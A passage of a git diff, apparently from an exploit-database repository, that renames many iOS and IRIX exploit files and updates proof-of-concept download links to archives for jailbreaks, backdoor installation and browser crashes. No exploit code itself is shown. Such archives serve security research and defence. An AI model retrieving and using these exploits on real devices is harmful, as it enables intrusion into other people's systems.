https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39364.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39364.zip \ No newline at end of file diff --git a/platforms/ios/dos/40906.txt b/exploits/ios/dos/40906.txt similarity index 97% rename from platforms/ios/dos/40906.txt rename to exploits/ios/dos/40906.txt index 6245f9af5..ad4bfa835 100644 --- a/platforms/ios/dos/40906.txt +++ b/exploits/ios/dos/40906.txt @@ -109,7 +109,7 @@ or https://cert.cx/appleios10/expl.html just click on this link by using Safari. EDB Proofs of Concept Mirror: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40906.zip -------------------------------------------------------------------------------------- 5. Safari and sandbox diff --git a/platforms/ios/dos/42014.txt b/exploits/ios/dos/42014.txt similarity index 97% rename from platforms/ios/dos/42014.txt rename to exploits/ios/dos/42014.txt index c091f7dab..8bc85747a 100644 --- a/platforms/ios/dos/42014.txt +++ b/exploits/ios/dos/42014.txt @@ -131,4 +131,4 @@ localNotification.soundName = UILocalNotificationDefaultSoundName; Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42014.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42014.zip \ No newline at end of file diff --git a/platforms/ios/dos/43107.py b/exploits/ios/dos/43107.py similarity index 100% rename from platforms/ios/dos/43107.py rename to exploits/ios/dos/43107.py diff --git a/platforms/ios/dos/43161.py b/exploits/ios/dos/43161.py similarity index 100% rename from platforms/ios/dos/43161.py rename to exploits/ios/dos/43161.py diff --git a/platforms/ios/dos/5151.pl b/exploits/ios/dos/5151.pl similarity index 100% rename from platforms/ios/dos/5151.pl rename to exploits/ios/dos/5151.pl diff --git a/platforms/ios/local/14538.txt b/exploits/ios/local/14538.txt similarity index 84% rename from platforms/ios/local/14538.txt rename to exploits/ios/local/14538.txt index b7cec0416..f2f0888cc 100644 --- a/platforms/ios/local/14538.txt +++ b/exploits/ios/local/14538.txt @@ -1,3 +1,3 @@ The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file diff --git a/platforms/ios/local/35010.txt b/exploits/ios/local/35010.txt similarity index 100% rename from platforms/ios/local/35010.txt rename to exploits/ios/local/35010.txt diff --git a/platforms/ios/local/42555.txt b/exploits/ios/local/42555.txt similarity index 95% rename from platforms/ios/local/42555.txt rename to exploits/ios/local/42555.txt index 4da56a62c..6808590f3 100644 --- a/platforms/ios/local/42555.txt +++ b/exploits/ios/local/42555.txt @@ -35,4 +35,4 @@ Credit for finding the vulnerabilities, chaining them together, writing the expl Proof of Concept: https://github.com/doadam/ziVA -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42555.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42555.zip \ No newline at end of file diff --git a/platforms/ios/remote/15186.txt b/exploits/ios/remote/15186.txt similarity index 100% rename from platforms/ios/remote/15186.txt rename to exploits/ios/remote/15186.txt diff --git a/platforms/ios/remote/15664.txt b/exploits/ios/remote/15664.txt similarity index 100% rename from platforms/ios/remote/15664.txt rename to exploits/ios/remote/15664.txt diff --git a/platforms/ios/remote/16208.txt b/exploits/ios/remote/16208.txt similarity index 100% rename from platforms/ios/remote/16208.txt rename to exploits/ios/remote/16208.txt diff --git a/platforms/ios/remote/16209.txt b/exploits/ios/remote/16209.txt similarity index 100% rename from platforms/ios/remote/16209.txt rename to exploits/ios/remote/16209.txt diff --git a/platforms/ios/remote/16228.txt b/exploits/ios/remote/16228.txt similarity index 100% rename from platforms/ios/remote/16228.txt rename to exploits/ios/remote/16228.txt diff --git a/platforms/ios/remote/16229.txt b/exploits/ios/remote/16229.txt similarity index 100% rename from platforms/ios/remote/16229.txt rename to exploits/ios/remote/16229.txt diff --git a/platforms/ios/remote/16231.txt b/exploits/ios/remote/16231.txt similarity index 100% rename from platforms/ios/remote/16231.txt rename to exploits/ios/remote/16231.txt diff --git a/platforms/ios/remote/16271.txt b/exploits/ios/remote/16271.txt similarity index 100% rename from platforms/ios/remote/16271.txt rename to exploits/ios/remote/16271.txt diff --git a/platforms/ios/remote/16278.py b/exploits/ios/remote/16278.py similarity index 100% rename from platforms/ios/remote/16278.py rename to exploits/ios/remote/16278.py diff --git a/platforms/ios/remote/16972.txt b/exploits/ios/remote/16972.txt similarity index 100% rename from platforms/ios/remote/16972.txt rename to exploits/ios/remote/16972.txt diff --git a/platforms/ios/remote/21868.rb b/exploits/ios/remote/21868.rb similarity index 100% rename from platforms/ios/remote/21868.rb rename to exploits/ios/remote/21868.rb diff --git a/platforms/ios/remote/21869.rb b/exploits/ios/remote/21869.rb similarity index 100% rename from platforms/ios/remote/21869.rb rename to exploits/ios/remote/21869.rb diff --git a/platforms/ios/remote/28081.txt b/exploits/ios/remote/28081.txt similarity index 96% rename from platforms/ios/remote/28081.txt rename to exploits/ios/remote/28081.txt index 7d8a95168..2aa19e05e 100644 --- a/platforms/ios/remote/28081.txt +++ b/exploits/ios/remote/28081.txt @@ -54,7 +54,7 @@ into the JS code). The full exploit code is available here: http://packetstormsecurity.com/files/123088/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28081.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28081.tgz +------------------------------------------------------------------------------+ diff --git a/platforms/ios/remote/32738.txt b/exploits/ios/remote/32738.txt similarity index 100% rename from platforms/ios/remote/32738.txt rename to exploits/ios/remote/32738.txt diff --git a/platforms/ios/remote/34399.txt b/exploits/ios/remote/34399.txt similarity index 100% rename from platforms/ios/remote/34399.txt rename to exploits/ios/remote/34399.txt diff --git a/platforms/ios/remote/37097.py b/exploits/ios/remote/37097.py similarity index 100% rename from platforms/ios/remote/37097.py rename to exploits/ios/remote/37097.py diff --git a/platforms/ios/remote/38058.py b/exploits/ios/remote/38058.py similarity index 100% rename from platforms/ios/remote/38058.py rename to exploits/ios/remote/38058.py diff --git a/platforms/ios/remote/38634.txt b/exploits/ios/remote/38634.txt similarity index 100% rename from platforms/ios/remote/38634.txt rename to exploits/ios/remote/38634.txt diff --git a/platforms/ios/remote/39114.txt b/exploits/ios/remote/39114.txt similarity index 100% rename from platforms/ios/remote/39114.txt rename to exploits/ios/remote/39114.txt diff --git a/platforms/ios/remote/42784.txt b/exploits/ios/remote/42784.txt similarity index 97% rename from platforms/ios/remote/42784.txt rename to exploits/ios/remote/42784.txt index 25efe399c..e821865e9 100644 --- a/platforms/ios/remote/42784.txt +++ b/exploits/ios/remote/42784.txt @@ -32,4 +32,4 @@ Following the steps above should result in installation of a simple backdoor all Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42784.zip \ No newline at end of file diff --git a/platforms/ios/remote/42996.txt b/exploits/ios/remote/42996.txt similarity index 97% rename from platforms/ios/remote/42996.txt rename to exploits/ios/remote/42996.txt index 370aaf3cb..6be363301 100644 --- a/platforms/ios/remote/42996.txt +++ b/exploits/ios/remote/42996.txt @@ -33,4 +33,4 @@ Following the steps above should result in DART's descriptor being mapped into I Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42996.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42996.zip \ No newline at end of file diff --git a/platforms/ios/webapps/24543.txt b/exploits/ios/webapps/24543.txt similarity index 100% rename from platforms/ios/webapps/24543.txt rename to exploits/ios/webapps/24543.txt diff --git a/platforms/ios/webapps/24603.txt b/exploits/ios/webapps/24603.txt similarity index 100% rename from platforms/ios/webapps/24603.txt rename to exploits/ios/webapps/24603.txt diff --git a/platforms/ios/webapps/25412.txt b/exploits/ios/webapps/25412.txt similarity index 100% rename from platforms/ios/webapps/25412.txt rename to exploits/ios/webapps/25412.txt diff --git a/platforms/ios/webapps/25414.txt b/exploits/ios/webapps/25414.txt similarity index 100% rename from platforms/ios/webapps/25414.txt rename to exploits/ios/webapps/25414.txt diff --git a/platforms/ios/webapps/25415.txt b/exploits/ios/webapps/25415.txt similarity index 100% rename from platforms/ios/webapps/25415.txt rename to exploits/ios/webapps/25415.txt diff --git a/platforms/ios/webapps/25417.txt b/exploits/ios/webapps/25417.txt similarity index 100% rename from platforms/ios/webapps/25417.txt rename to exploits/ios/webapps/25417.txt diff --git a/platforms/ios/webapps/26888.txt b/exploits/ios/webapps/26888.txt similarity index 100% rename from platforms/ios/webapps/26888.txt rename to exploits/ios/webapps/26888.txt diff --git a/platforms/ios/webapps/26890.txt b/exploits/ios/webapps/26890.txt similarity index 100% rename from platforms/ios/webapps/26890.txt rename to exploits/ios/webapps/26890.txt diff --git a/platforms/ios/webapps/26952.txt b/exploits/ios/webapps/26952.txt similarity index 100% rename from platforms/ios/webapps/26952.txt rename to exploits/ios/webapps/26952.txt diff --git a/platforms/ios/webapps/26953.txt b/exploits/ios/webapps/26953.txt similarity index 100% rename from platforms/ios/webapps/26953.txt rename to exploits/ios/webapps/26953.txt diff --git a/platforms/ios/webapps/26954.txt b/exploits/ios/webapps/26954.txt similarity index 100% rename from platforms/ios/webapps/26954.txt rename to exploits/ios/webapps/26954.txt diff --git a/platforms/ios/webapps/27042.txt b/exploits/ios/webapps/27042.txt similarity index 100% rename from platforms/ios/webapps/27042.txt rename to exploits/ios/webapps/27042.txt diff --git a/platforms/ios/webapps/27188.txt b/exploits/ios/webapps/27188.txt similarity index 100% rename from platforms/ios/webapps/27188.txt rename to exploits/ios/webapps/27188.txt diff --git a/platforms/ios/webapps/27189.txt b/exploits/ios/webapps/27189.txt similarity index 100% rename from platforms/ios/webapps/27189.txt rename to exploits/ios/webapps/27189.txt diff --git a/platforms/ios/webapps/27376.txt b/exploits/ios/webapps/27376.txt similarity index 100% rename from platforms/ios/webapps/27376.txt rename to exploits/ios/webapps/27376.txt diff --git a/platforms/ios/webapps/27655.txt b/exploits/ios/webapps/27655.txt similarity index 100% rename from platforms/ios/webapps/27655.txt rename to exploits/ios/webapps/27655.txt diff --git a/platforms/ios/webapps/27656.txt b/exploits/ios/webapps/27656.txt similarity index 100% rename from platforms/ios/webapps/27656.txt rename to exploits/ios/webapps/27656.txt diff --git a/platforms/ios/webapps/28236.txt b/exploits/ios/webapps/28236.txt similarity index 100% rename from platforms/ios/webapps/28236.txt rename to exploits/ios/webapps/28236.txt diff --git a/platforms/ios/webapps/28975.txt b/exploits/ios/webapps/28975.txt similarity index 100% rename from platforms/ios/webapps/28975.txt rename to exploits/ios/webapps/28975.txt diff --git a/platforms/ios/webapps/28976.txt b/exploits/ios/webapps/28976.txt similarity index 100% rename from platforms/ios/webapps/28976.txt rename to exploits/ios/webapps/28976.txt diff --git a/platforms/ios/webapps/28977.txt b/exploits/ios/webapps/28977.txt similarity index 100% rename from platforms/ios/webapps/28977.txt rename to exploits/ios/webapps/28977.txt diff --git a/platforms/ios/webapps/28978.txt b/exploits/ios/webapps/28978.txt similarity index 100% rename from platforms/ios/webapps/28978.txt rename to exploits/ios/webapps/28978.txt diff --git a/platforms/ios/webapps/29633.txt b/exploits/ios/webapps/29633.txt similarity index 100% rename from platforms/ios/webapps/29633.txt rename to exploits/ios/webapps/29633.txt diff --git a/platforms/ios/webapps/30000.txt b/exploits/ios/webapps/30000.txt similarity index 100% rename from platforms/ios/webapps/30000.txt rename to exploits/ios/webapps/30000.txt diff --git a/platforms/ios/webapps/30031.txt b/exploits/ios/webapps/30031.txt similarity index 100% rename from platforms/ios/webapps/30031.txt rename to exploits/ios/webapps/30031.txt diff --git a/platforms/ios/webapps/30055.txt b/exploits/ios/webapps/30055.txt similarity index 100% rename from platforms/ios/webapps/30055.txt rename to exploits/ios/webapps/30055.txt diff --git a/platforms/ios/webapps/30145.txt b/exploits/ios/webapps/30145.txt similarity index 100% rename from platforms/ios/webapps/30145.txt rename to exploits/ios/webapps/30145.txt diff --git a/platforms/ios/webapps/30146.txt b/exploits/ios/webapps/30146.txt similarity index 100% rename from platforms/ios/webapps/30146.txt rename to exploits/ios/webapps/30146.txt diff --git a/platforms/ios/webapps/30215.txt b/exploits/ios/webapps/30215.txt similarity index 100% rename from platforms/ios/webapps/30215.txt rename to exploits/ios/webapps/30215.txt diff --git a/platforms/ios/webapps/30311.txt b/exploits/ios/webapps/30311.txt similarity index 100% rename from platforms/ios/webapps/30311.txt rename to exploits/ios/webapps/30311.txt diff --git a/platforms/ios/webapps/30375.txt b/exploits/ios/webapps/30375.txt similarity index 100% rename from platforms/ios/webapps/30375.txt rename to exploits/ios/webapps/30375.txt diff --git a/platforms/ios/webapps/30476.txt b/exploits/ios/webapps/30476.txt similarity index 100% rename from platforms/ios/webapps/30476.txt rename to exploits/ios/webapps/30476.txt diff --git a/platforms/ios/webapps/31258.txt b/exploits/ios/webapps/31258.txt similarity index 100% rename from platforms/ios/webapps/31258.txt rename to exploits/ios/webapps/31258.txt diff --git a/platforms/ios/webapps/31573.txt b/exploits/ios/webapps/31573.txt similarity index 100% rename from platforms/ios/webapps/31573.txt rename to exploits/ios/webapps/31573.txt diff --git a/platforms/ios/webapps/31618.txt b/exploits/ios/webapps/31618.txt similarity index 100% rename from platforms/ios/webapps/31618.txt rename to exploits/ios/webapps/31618.txt diff --git a/platforms/ios/webapps/31691.txt b/exploits/ios/webapps/31691.txt similarity index 100% rename from platforms/ios/webapps/31691.txt rename to exploits/ios/webapps/31691.txt diff --git a/platforms/ios/webapps/31692.txt b/exploits/ios/webapps/31692.txt similarity index 100% rename from platforms/ios/webapps/31692.txt rename to exploits/ios/webapps/31692.txt diff --git a/platforms/ios/webapps/31693.txt b/exploits/ios/webapps/31693.txt similarity index 100% rename from platforms/ios/webapps/31693.txt rename to exploits/ios/webapps/31693.txt diff --git a/platforms/ios/webapps/31733.txt b/exploits/ios/webapps/31733.txt similarity index 100% rename from platforms/ios/webapps/31733.txt rename to exploits/ios/webapps/31733.txt diff --git a/platforms/ios/webapps/31896.txt b/exploits/ios/webapps/31896.txt similarity index 100% rename from platforms/ios/webapps/31896.txt rename to exploits/ios/webapps/31896.txt diff --git a/platforms/ios/webapps/31900.txt b/exploits/ios/webapps/31900.txt similarity index 100% rename from platforms/ios/webapps/31900.txt rename to exploits/ios/webapps/31900.txt diff --git a/platforms/ios/webapps/31962.txt b/exploits/ios/webapps/31962.txt similarity index 100% rename from platforms/ios/webapps/31962.txt rename to exploits/ios/webapps/31962.txt diff --git a/platforms/ios/webapps/32374.txt b/exploits/ios/webapps/32374.txt similarity index 100% rename from platforms/ios/webapps/32374.txt rename to exploits/ios/webapps/32374.txt diff --git a/platforms/ios/webapps/32557.txt b/exploits/ios/webapps/32557.txt similarity index 100% rename from platforms/ios/webapps/32557.txt rename to exploits/ios/webapps/32557.txt diff --git a/platforms/ios/webapps/32558.txt b/exploits/ios/webapps/32558.txt similarity index 100% rename from platforms/ios/webapps/32558.txt rename to exploits/ios/webapps/32558.txt diff --git a/platforms/ios/webapps/32559.txt b/exploits/ios/webapps/32559.txt similarity index 100% rename from platforms/ios/webapps/32559.txt rename to exploits/ios/webapps/32559.txt diff --git a/platforms/ios/webapps/32560.txt b/exploits/ios/webapps/32560.txt similarity index 100% rename from platforms/ios/webapps/32560.txt rename to exploits/ios/webapps/32560.txt diff --git a/platforms/ios/webapps/32569.txt b/exploits/ios/webapps/32569.txt similarity index 100% rename from platforms/ios/webapps/32569.txt rename to exploits/ios/webapps/32569.txt diff --git a/platforms/ios/webapps/32619.txt b/exploits/ios/webapps/32619.txt similarity index 100% rename from platforms/ios/webapps/32619.txt rename to exploits/ios/webapps/32619.txt diff --git a/platforms/ios/webapps/32620.txt b/exploits/ios/webapps/32620.txt similarity index 100% rename from platforms/ios/webapps/32620.txt rename to exploits/ios/webapps/32620.txt diff --git a/platforms/ios/webapps/32664.txt b/exploits/ios/webapps/32664.txt similarity index 100% rename from platforms/ios/webapps/32664.txt rename to exploits/ios/webapps/32664.txt diff --git a/platforms/ios/webapps/32703.txt b/exploits/ios/webapps/32703.txt similarity index 100% rename from platforms/ios/webapps/32703.txt rename to exploits/ios/webapps/32703.txt diff --git a/platforms/ios/webapps/32866.txt b/exploits/ios/webapps/32866.txt similarity index 100% rename from platforms/ios/webapps/32866.txt rename to exploits/ios/webapps/32866.txt diff --git a/platforms/ios/webapps/33026.txt b/exploits/ios/webapps/33026.txt similarity index 100% rename from platforms/ios/webapps/33026.txt rename to exploits/ios/webapps/33026.txt diff --git a/platforms/ios/webapps/33627.txt b/exploits/ios/webapps/33627.txt similarity index 100% rename from platforms/ios/webapps/33627.txt rename to exploits/ios/webapps/33627.txt diff --git a/platforms/ios/webapps/33628.txt b/exploits/ios/webapps/33628.txt similarity index 100% rename from platforms/ios/webapps/33628.txt rename to exploits/ios/webapps/33628.txt diff --git a/platforms/ios/webapps/33629.txt b/exploits/ios/webapps/33629.txt similarity index 100% rename from platforms/ios/webapps/33629.txt rename to exploits/ios/webapps/33629.txt diff --git a/platforms/ios/webapps/33630.txt b/exploits/ios/webapps/33630.txt similarity index 100% rename from platforms/ios/webapps/33630.txt rename to exploits/ios/webapps/33630.txt diff --git a/platforms/ios/webapps/33631.txt b/exploits/ios/webapps/33631.txt similarity index 100% rename from platforms/ios/webapps/33631.txt rename to exploits/ios/webapps/33631.txt diff --git a/platforms/ios/webapps/33632.txt b/exploits/ios/webapps/33632.txt similarity index 100% rename from platforms/ios/webapps/33632.txt rename to exploits/ios/webapps/33632.txt diff --git a/platforms/ios/webapps/33996.txt b/exploits/ios/webapps/33996.txt similarity index 100% rename from platforms/ios/webapps/33996.txt rename to exploits/ios/webapps/33996.txt diff --git a/platforms/ios/webapps/34196.txt b/exploits/ios/webapps/34196.txt similarity index 100% rename from platforms/ios/webapps/34196.txt rename to exploits/ios/webapps/34196.txt diff --git a/platforms/ios/webapps/34240.txt b/exploits/ios/webapps/34240.txt similarity index 100% rename from platforms/ios/webapps/34240.txt rename to exploits/ios/webapps/34240.txt diff --git a/platforms/ios/webapps/34243.txt b/exploits/ios/webapps/34243.txt similarity index 100% rename from platforms/ios/webapps/34243.txt rename to exploits/ios/webapps/34243.txt diff --git a/platforms/ios/webapps/34263.txt b/exploits/ios/webapps/34263.txt similarity index 100% rename from platforms/ios/webapps/34263.txt rename to exploits/ios/webapps/34263.txt diff --git a/platforms/ios/webapps/34264.txt b/exploits/ios/webapps/34264.txt similarity index 100% rename from platforms/ios/webapps/34264.txt rename to exploits/ios/webapps/34264.txt diff --git a/platforms/ios/webapps/34303.txt b/exploits/ios/webapps/34303.txt similarity index 100% rename from platforms/ios/webapps/34303.txt rename to exploits/ios/webapps/34303.txt diff --git a/platforms/ios/webapps/34305.txt b/exploits/ios/webapps/34305.txt similarity index 100% rename from platforms/ios/webapps/34305.txt rename to exploits/ios/webapps/34305.txt diff --git a/platforms/ios/webapps/34626.txt b/exploits/ios/webapps/34626.txt similarity index 100% rename from platforms/ios/webapps/34626.txt rename to exploits/ios/webapps/34626.txt diff --git a/platforms/ios/webapps/34627.txt b/exploits/ios/webapps/34627.txt similarity index 100% rename from platforms/ios/webapps/34627.txt rename to exploits/ios/webapps/34627.txt diff --git a/platforms/ios/webapps/34664.txt b/exploits/ios/webapps/34664.txt similarity index 100% rename from platforms/ios/webapps/34664.txt rename to exploits/ios/webapps/34664.txt diff --git a/platforms/ios/webapps/34682.txt b/exploits/ios/webapps/34682.txt similarity index 100% rename from platforms/ios/webapps/34682.txt rename to exploits/ios/webapps/34682.txt diff --git a/platforms/ios/webapps/34816.txt b/exploits/ios/webapps/34816.txt similarity index 100% rename from platforms/ios/webapps/34816.txt rename to exploits/ios/webapps/34816.txt diff --git a/platforms/ios/webapps/34957.txt b/exploits/ios/webapps/34957.txt similarity index 100% rename from platforms/ios/webapps/34957.txt rename to exploits/ios/webapps/34957.txt diff --git a/platforms/ios/webapps/34981.txt b/exploits/ios/webapps/34981.txt similarity index 100% rename from platforms/ios/webapps/34981.txt rename to exploits/ios/webapps/34981.txt diff --git a/platforms/ios/webapps/35037.txt b/exploits/ios/webapps/35037.txt similarity index 100% rename from platforms/ios/webapps/35037.txt rename to exploits/ios/webapps/35037.txt diff --git a/platforms/ios/webapps/35038.txt b/exploits/ios/webapps/35038.txt similarity index 100% rename from platforms/ios/webapps/35038.txt rename to exploits/ios/webapps/35038.txt diff --git a/platforms/ios/webapps/35082.txt b/exploits/ios/webapps/35082.txt similarity index 100% rename from platforms/ios/webapps/35082.txt rename to exploits/ios/webapps/35082.txt diff --git a/platforms/ios/webapps/35083.txt b/exploits/ios/webapps/35083.txt similarity index 100% rename from platforms/ios/webapps/35083.txt rename to exploits/ios/webapps/35083.txt diff --git a/platforms/ios/webapps/35775.txt b/exploits/ios/webapps/35775.txt similarity index 100% rename from platforms/ios/webapps/35775.txt rename to exploits/ios/webapps/35775.txt diff --git a/platforms/ios/webapps/36795.txt b/exploits/ios/webapps/36795.txt similarity index 100% rename from platforms/ios/webapps/36795.txt rename to exploits/ios/webapps/36795.txt diff --git a/platforms/ios/webapps/36796.txt b/exploits/ios/webapps/36796.txt similarity index 100% rename from platforms/ios/webapps/36796.txt rename to exploits/ios/webapps/36796.txt diff --git a/platforms/ios/webapps/36797.txt b/exploits/ios/webapps/36797.txt similarity index 100% rename from platforms/ios/webapps/36797.txt rename to exploits/ios/webapps/36797.txt diff --git a/platforms/ios/webapps/36798.txt b/exploits/ios/webapps/36798.txt similarity index 100% rename from platforms/ios/webapps/36798.txt rename to exploits/ios/webapps/36798.txt diff --git a/platforms/ios/webapps/36904.txt b/exploits/ios/webapps/36904.txt similarity index 100% rename from platforms/ios/webapps/36904.txt rename to exploits/ios/webapps/36904.txt diff --git a/platforms/ios/webapps/36922.txt b/exploits/ios/webapps/36922.txt similarity index 100% rename from platforms/ios/webapps/36922.txt rename to exploits/ios/webapps/36922.txt diff --git a/platforms/ios/webapps/36924.txt b/exploits/ios/webapps/36924.txt similarity index 100% rename from platforms/ios/webapps/36924.txt rename to exploits/ios/webapps/36924.txt diff --git a/platforms/ios/webapps/36943.txt b/exploits/ios/webapps/36943.txt similarity index 100% rename from platforms/ios/webapps/36943.txt rename to exploits/ios/webapps/36943.txt diff --git a/platforms/ios/webapps/37057.txt b/exploits/ios/webapps/37057.txt similarity index 100% rename from platforms/ios/webapps/37057.txt rename to exploits/ios/webapps/37057.txt diff --git a/platforms/ios/webapps/37213.txt b/exploits/ios/webapps/37213.txt similarity index 100% rename from platforms/ios/webapps/37213.txt rename to exploits/ios/webapps/37213.txt diff --git a/platforms/ios/webapps/37492.txt b/exploits/ios/webapps/37492.txt similarity index 100% rename from platforms/ios/webapps/37492.txt rename to exploits/ios/webapps/37492.txt diff --git a/platforms/ios/webapps/37761.txt b/exploits/ios/webapps/37761.txt similarity index 100% rename from platforms/ios/webapps/37761.txt rename to exploits/ios/webapps/37761.txt diff --git a/platforms/ios/webapps/38258.txt b/exploits/ios/webapps/38258.txt similarity index 100% rename from platforms/ios/webapps/38258.txt rename to exploits/ios/webapps/38258.txt diff --git a/platforms/ios/webapps/38342.txt b/exploits/ios/webapps/38342.txt similarity index 100% rename from platforms/ios/webapps/38342.txt rename to exploits/ios/webapps/38342.txt diff --git a/platforms/ios/webapps/38343.txt b/exploits/ios/webapps/38343.txt similarity index 100% rename from platforms/ios/webapps/38343.txt rename to exploits/ios/webapps/38343.txt diff --git a/platforms/ios/webapps/39335.txt b/exploits/ios/webapps/39335.txt similarity index 100% rename from platforms/ios/webapps/39335.txt rename to exploits/ios/webapps/39335.txt diff --git a/platforms/ios/webapps/39479.txt b/exploits/ios/webapps/39479.txt similarity index 100% rename from platforms/ios/webapps/39479.txt rename to exploits/ios/webapps/39479.txt diff --git a/platforms/ios/webapps/39721.txt b/exploits/ios/webapps/39721.txt similarity index 100% rename from platforms/ios/webapps/39721.txt rename to exploits/ios/webapps/39721.txt diff --git a/platforms/ios/webapps/41401.txt b/exploits/ios/webapps/41401.txt similarity index 100% rename from platforms/ios/webapps/41401.txt rename to exploits/ios/webapps/41401.txt diff --git a/platforms/ios/webapps/41432.txt b/exploits/ios/webapps/41432.txt similarity index 100% rename from platforms/ios/webapps/41432.txt rename to exploits/ios/webapps/41432.txt diff --git a/platforms/irix/dos/19357.sh b/exploits/irix/dos/19357.sh similarity index 100% rename from platforms/irix/dos/19357.sh rename to exploits/irix/dos/19357.sh diff --git a/platforms/irix/dos/21431.txt b/exploits/irix/dos/21431.txt similarity index 100% rename from platforms/irix/dos/21431.txt rename to exploits/irix/dos/21431.txt diff --git a/platforms/irix/dos/22638.txt b/exploits/irix/dos/22638.txt similarity index 100% rename from platforms/irix/dos/22638.txt rename to exploits/irix/dos/22638.txt diff --git a/platforms/irix/dos/23167.c b/exploits/irix/dos/23167.c similarity index 100% rename from platforms/irix/dos/23167.c rename to exploits/irix/dos/23167.c diff --git a/platforms/irix/local/1577.sh b/exploits/irix/local/1577.sh similarity index 100% rename from platforms/irix/local/1577.sh rename to exploits/irix/local/1577.sh diff --git a/platforms/irix/local/19066.txt b/exploits/irix/local/19066.txt similarity index 100% rename from platforms/irix/local/19066.txt rename to exploits/irix/local/19066.txt diff --git a/platforms/irix/local/19067.txt b/exploits/irix/local/19067.txt similarity index 100% rename from platforms/irix/local/19067.txt rename to exploits/irix/local/19067.txt diff --git a/platforms/irix/local/19163.sh b/exploits/irix/local/19163.sh similarity index 100% rename from platforms/irix/local/19163.sh rename to exploits/irix/local/19163.sh diff --git a/platforms/irix/local/19210.txt b/exploits/irix/local/19210.txt similarity index 100% rename from platforms/irix/local/19210.txt rename to exploits/irix/local/19210.txt diff --git a/platforms/irix/local/19260.sh b/exploits/irix/local/19260.sh similarity index 100% rename from platforms/irix/local/19260.sh rename to exploits/irix/local/19260.sh diff --git a/platforms/irix/local/19262.txt b/exploits/irix/local/19262.txt similarity index 100% rename from platforms/irix/local/19262.txt rename to exploits/irix/local/19262.txt diff --git a/platforms/irix/local/19267.c b/exploits/irix/local/19267.c similarity index 100% rename from platforms/irix/local/19267.c rename to exploits/irix/local/19267.c diff --git a/platforms/irix/local/19268.txt b/exploits/irix/local/19268.txt similarity index 100% rename from platforms/irix/local/19268.txt rename to exploits/irix/local/19268.txt diff --git a/platforms/irix/local/19269.txt b/exploits/irix/local/19269.txt similarity index 100% rename from platforms/irix/local/19269.txt rename to exploits/irix/local/19269.txt diff --git a/platforms/irix/local/19273.sh b/exploits/irix/local/19273.sh similarity index 100% rename from platforms/irix/local/19273.sh rename to exploits/irix/local/19273.sh diff --git a/platforms/irix/local/19274.c b/exploits/irix/local/19274.c similarity index 100% rename from platforms/irix/local/19274.c rename to exploits/irix/local/19274.c diff --git a/platforms/irix/local/19275.txt b/exploits/irix/local/19275.txt similarity index 100% rename from platforms/irix/local/19275.txt rename to exploits/irix/local/19275.txt diff --git a/platforms/irix/local/19276.c b/exploits/irix/local/19276.c similarity index 100% rename from platforms/irix/local/19276.c rename to exploits/irix/local/19276.c diff --git a/platforms/irix/local/19277.c b/exploits/irix/local/19277.c similarity index 100% rename from platforms/irix/local/19277.c rename to exploits/irix/local/19277.c diff --git a/platforms/irix/local/19280.txt b/exploits/irix/local/19280.txt similarity index 100% rename from platforms/irix/local/19280.txt rename to exploits/irix/local/19280.txt diff --git a/platforms/irix/local/19304.txt b/exploits/irix/local/19304.txt similarity index 100% rename from platforms/irix/local/19304.txt rename to exploits/irix/local/19304.txt diff --git a/platforms/irix/local/19310.c b/exploits/irix/local/19310.c similarity index 100% rename from platforms/irix/local/19310.c rename to exploits/irix/local/19310.c diff --git a/platforms/irix/local/19313.txt b/exploits/irix/local/19313.txt similarity index 100% rename from platforms/irix/local/19313.txt rename to exploits/irix/local/19313.txt diff --git a/platforms/irix/local/19317.c b/exploits/irix/local/19317.c similarity index 100% rename from platforms/irix/local/19317.c rename to exploits/irix/local/19317.c diff --git a/platforms/irix/local/19319.txt b/exploits/irix/local/19319.txt similarity index 100% rename from platforms/irix/local/19319.txt rename to exploits/irix/local/19319.txt diff --git a/platforms/irix/local/19347.c b/exploits/irix/local/19347.c similarity index 100% rename from platforms/irix/local/19347.c rename to exploits/irix/local/19347.c diff --git a/platforms/irix/local/19349.txt b/exploits/irix/local/19349.txt similarity index 100% rename from platforms/irix/local/19349.txt rename to exploits/irix/local/19349.txt diff --git a/platforms/irix/local/19351.sh b/exploits/irix/local/19351.sh similarity index 100% rename from platforms/irix/local/19351.sh rename to exploits/irix/local/19351.sh diff --git a/platforms/irix/local/19353.txt b/exploits/irix/local/19353.txt similarity index 100% rename from platforms/irix/local/19353.txt rename to exploits/irix/local/19353.txt diff --git a/platforms/irix/local/19355.txt b/exploits/irix/local/19355.txt similarity index 100% rename from platforms/irix/local/19355.txt rename to exploits/irix/local/19355.txt diff --git a/platforms/irix/local/19356.txt b/exploits/irix/local/19356.txt similarity index 100% rename from platforms/irix/local/19356.txt rename to exploits/irix/local/19356.txt diff --git a/platforms/irix/local/19358.txt b/exploits/irix/local/19358.txt similarity index 100% rename from platforms/irix/local/19358.txt rename to exploits/irix/local/19358.txt diff --git a/platforms/irix/local/19706.sh b/exploits/irix/local/19706.sh similarity index 100% rename from platforms/irix/local/19706.sh rename to 